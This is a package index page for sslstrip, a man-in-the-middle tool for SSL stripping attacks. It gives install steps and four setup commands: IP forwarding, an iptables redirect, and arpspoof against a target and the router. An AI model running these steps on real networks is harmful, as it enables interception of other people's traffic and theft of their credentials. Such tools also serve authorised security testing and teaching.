Skip to main content

sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks.

It requires Python 2.5 or newer, along with the ‘twisted’ python module.

Installing:

pip install sslstrip

Running:

sslstrip can be run from the source base without installation. Just run ‘python sslstrip.py -h’ as a non-root user to get the command-line options.

The four steps to getting this working (assuming you’re running Linux) are:

  1. Flip your machine into forwarding mode (as root): echo “1” > /proc/sys/net/ipv4/ip_forward

  2. Setup iptables to intercept HTTP requests (as root): iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <yourListenPort>

  3. Run sslstrip with the command-line options you’d like (see above).

  4. Run arpspoof to redirect traffic to your machine (as root): arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>

More Info:

http://www.thoughtcrime.org/software/sslstrip/

Release files for sslstrip 0.9.2

For a detailed explanation of source distributions (sdists) and built distributions (wheels), please see the package formats documentation.

Source distribution (sdist)

Source distribution for sslstrip 0.9.2
File Size Uploaded
sslstrip-0.9.2.tar.gz 9.2 kB Details

Release files / sslstrip-0.9.2.tar.gz

Download URL sslstrip-0.9.2.tar.gz
Size 9.2 kB
Tags Source
SHA-256 checksum
How to use checksums
efd5a3d10f1189e49b5ed038b01d8ae559dee245807970099e58940c55b28277
BLAKE2b-256 checksum
How to use checksums
1802bad7817d167ad2547bbddaefa1d31d3a06857f5e7829f494dbd2d6abdf8e
Upload date
Uploaded using Trusted Publishing?
What is trusted publishing?
No

Release history Release notifications | RSS feed

This release

0.9.2 This release

1 release file

Anthropic, PBC Visionary sponsor Bloomberg Visionary sponsor Hudson River Trading Visionary sponsor Meta Visionary sponsor NVIDIA Visionary sponsor Microsoft Sustainability sponsor Depot Continuous Integration AWS Cloud computing and Security Sponsor Datadog Monitoring Fastly CDN Google Download Analytics Sentry Error logging StatusPage Status page